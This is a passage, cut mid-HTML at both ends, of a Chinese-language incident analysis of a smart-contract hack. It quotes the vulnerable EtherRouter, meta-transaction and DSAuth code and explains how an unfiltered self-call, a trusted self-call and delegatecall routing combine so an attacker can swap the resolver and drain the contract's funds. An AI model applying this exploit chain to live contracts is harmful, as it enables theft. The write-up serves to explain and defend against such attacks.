normal;">0x7490022b0e44aa65c030ac0d6728382a29458fc5</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 路由到实现合约 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x4e7f1e1e263678590007e89b7e129686ba7758d4</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 执行。该实现合约未开源，以下基于反编译结果：</span></span></h3></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="java"><code><span leaf="">function <span class="code-snippet__title">executeMetaTransaction</span><span class="code-snippet__params">(</span></span></code><br/><code><span leaf="">    address userAddress,</span></code><br/><code><span leaf="">    bytes memory functionSignature,</span></code><br/><code><span leaf="">    bytes32 sigR,</span></code><br/><code><span leaf="">    bytes32 sigS,</span></code><br/><code><span leaf="">    uint8 sigV</span></code><br/><code><span leaf="">) <span class="code-snippet__keyword">public</span> <span class="code-snippet__title">returns</span> <span class="code-snippet__params">(bytes memory)</span> {</span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// 使用 nonce、address(this)、chainid、functionSignature 构造消息</span></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// 通过 ecrecover 校验签名恢复地址 == userAddress</span></span></code><br/><code><span leaf="">    require(recoveredAddress == userAddress);</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// nonce++</span></span></code><br/><code><span leaf="">    _executeMetaTransaction[userAddress]++;</span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// 构造 calldata</span></span></code><br/><code><span leaf="">    bytes <span class="code-snippet__type">memory</span> <span class="code-snippet__variable">callData</span> <span class="code-snippet__operator">=</span> abi.encodePacked(</span></code><br/><code><span leaf="">        functionSignature,</span></code><br/><code><span leaf="">        <span class="code-snippet__number">0x2bcc191e283bfba76a1369ec8ba06566f33010645097c104c312753e04935e8</span>,</span></code><br/><code><span leaf="">        userAddress</span></code><br/><code><span leaf="">    );</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// ⚠️ 漏洞点：验签后对 address(this) 执行任意 functionSignature 自调用，</span></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// 未禁止 setResolver(address)、setOwner(address)、setAuthority(address) 等敏感 selector</span></span></code><br/><code><span leaf="">    (bool success, bytes memory returnData) = address(<span class="code-snippet__built_in">this</span>).call(callData);</span></code><br/><code><span leaf="">    require(success);</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">    emit <span class="code-snippet__title">MetaTransactionExecuted</span><span class="code-snippet__params">(userAddress, msg.sender, </span></span></code><br/><code><span leaf="">    functionSignature);</span></code><br/><code></code><br/><code><span leaf="">    <span class="code-snippet__keyword">return</span> returnData;</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">问题本质：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 的设计意图是允许用户通过签名执行某些非敏感操作，但它对 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">functionSignature</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 不做任何过滤。攻击者可以使用自己的有效签名，让合约对自身调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">setResolver(恶意地址)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">。</span></span></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">DSAuth.isAuthorized</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 的自动授权：</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">src == address(this)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 即放行</span></span></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouter.setResolver(address)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 受到 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">auth</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 修饰符保护，本应只允许 owner 或 authority 调用：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="cs"><code><span leaf="">Resolver <span class="code-snippet__keyword">public</span> resolver;</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf=""><span class="code-snippet__function">function </span><span class="code-snippet__function"><span class="code-snippet__title">setResolver</span></span><span class="code-snippet__function">(</span><span class="code-snippet__function"><span class="code-snippet__params">address _resolver</span></span><span class="code-snippet__function">) </span><span class="code-snippet__function"><span class="code-snippet__keyword">public</span></span><span class="code-snippet__function"> auth</span> {</span></code><br/><code><span leaf="">    resolver = Resolver(_resolver);</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">但 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DSAuth.isAuthorized(address src, bytes4 sig)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中存在自调用自动授权逻辑：</span></span></p></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="kotlin"><code><span leaf="">function isAuthorized(address src, bytes4 sig) <span class="code-snippet__keyword">internal</span> view returns (bool) {</span></code><br/><code><span leaf="">    <span class="code-snippet__keyword">if</span> (src == address(<span class="code-snippet__keyword">this</span>)) {</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">true</span>; <span class="code-snippet__comment">// ⚠️ 漏洞点：自调用无条件授权</span></span></code><br/><code><span leaf="">    } <span class="code-snippet__keyword">else</span> <span class="code-snippet__keyword">if</span> (src == owner) {</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">true</span>;</span></code><br/><code><span leaf="">    } <span class="code-snippet__keyword">else</span> <span class="code-snippet__keyword">if</span> (authority == DSAuthority(<span class="code-snippet__number">0</span>)) {</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">return</span> <span class="code-snippet__literal">false</span>;</span></code><br/><code><span leaf="">    } <span class="code-snippet__keyword">else</span> {</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">return</span> authority.canCall(src, <span class="code-snippet__keyword">this</span>, sig);</span></code><br/><code><span leaf="">    }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">当 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">executeMetaTransaction</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 通过 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">address(this).call(setResolver(...))</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 触发自调用时，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">setResolver</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 中看到的 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">msg.sender</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 即为合约自身 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x5c59...</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">，因此被 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">DSAuth</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 自动放行。</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">单独来看，这两处设计都不算明显漏洞</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">——自调用授权在许多代理模式中很常见，元交易机制本身也合理。</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">但两套逻辑同时存在时，语义冲突就产生了：元交易提供的「任意自调用」能力恰好撞上了 DSAuth 的「自调用即信任」逻辑，合在一起就是完整的权限绕过链。</span></span></p><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">EtherRouter.fallback()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 的 delegatecall 动态路由：Resolver 被劫持后的完整控制权移交</span></span></h3></b></p><p class="code-snippet__fix code-snippet__js"><ul class="code-snippet__line-index code-snippet__js"></ul><pre class="code-snippet__js" data-lang="javascript"><code><span leaf=""><span class="code-snippet__title">fallback</span>() external payable {</span></code><br/><code><span leaf="">    address target = resolver.<span class="code-snippet__title">lookup</span>(msg.<span class="code-snippet__property">sig</span>);</span></code><br/><code><span leaf="">    <span class="code-snippet__built_in">require</span>(target != <span class="code-snippet__title">address</span>(<span class="code-snippet__number">0</span>));</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// ⚠️ 漏洞点：对 resolver 返回的地址无条件执行 delegatecall，</span></span></code><br/><code><span leaf="">    <span class="code-snippet__comment">// 一旦 resolver 被替换，任意未知 selector 都会被路由到攻击者实现</span></span></code><br/><code><span leaf="">    assembly {</span></code><br/><code><span leaf="">        <span class="code-snippet__title">calldatacopy</span>(<span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__title">calldatasize</span>())</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">let</span> result := <span class="code-snippet__title">delegatecall</span>(<span class="code-snippet__title">gas</span>(), target, <span class="code-snippet__number">0</span>, <span class="code-snippet__title">calldatasize</span>(), <span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>)</span></code><br/><code><span leaf="">        <span class="code-snippet__title">returndatacopy</span>(<span class="code-snippet__number">0</span>, <span class="code-snippet__number">0</span>, <span class="code-snippet__title">returndatasize</span>())</span></code><br/><code><span leaf=""><br/></span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">switch</span> result</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">case</span> <span class="code-snippet__number">0</span> { <span class="code-snippet__title">revert</span>(<span class="code-snippet__number">0</span>, <span class="code-snippet__title">returndatasize</span>()) }</span></code><br/><code><span leaf="">        <span class="code-snippet__keyword">default</span> { <span class="code-snippet__keyword">return</span>(<span class="code-snippet__number">0</span>, <span class="code-snippet__title">returndatasize</span>()) }</span></code><br/><code><span leaf="">    }</span></code><br/><code><span leaf="">}</span></code><br/></pre></p><p><b data-pm-slice="0 0 []"><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">resolver 被替换后，攻击者只需调用 </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">EtherRouter</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 上不存在的任意函数选择器，</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">fallback()</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;"> 就会无条件委托到攻击者控制的恶意实现。</span></span></p></b></p><p><b data-pm-slice="0 0 []"><h3 dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">恶意 Resolver 与 Drain 实现：无权限的函数映射注册表 + </span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;">address(this)</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-size: 18px;font-weight: bold;"> 资产清空</span></span></h3><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">攻击者预先部署了两个合约：</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: bold;">恶意 Resolver</span></span></p><p dir="ltr" style="text-indent: 0px;line-height: 25.6px;margin-bottom: 0px;text-align: left;"><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 255, 255);color: rgb(51, 51, 51);font-family: Optima-Regular, Optima, PingFangSC-light, PingFangTC-light, &#34;PingFang SC&#34;, Cambria, Cochin, Georgia, Times, &#34;Times New Roman&#34;, serif;font-size: 16px;letter-spacing: 0.544px;"><span textstyle="" style="font-weight: normal;">0x4e321af09012e15a67756522187c05b108b7ee0a</span></span><span leaf="" style="text-indent: 0px;line-height: 25.6px;font-weight: bold;text-align: left;background-color: rgb(255, 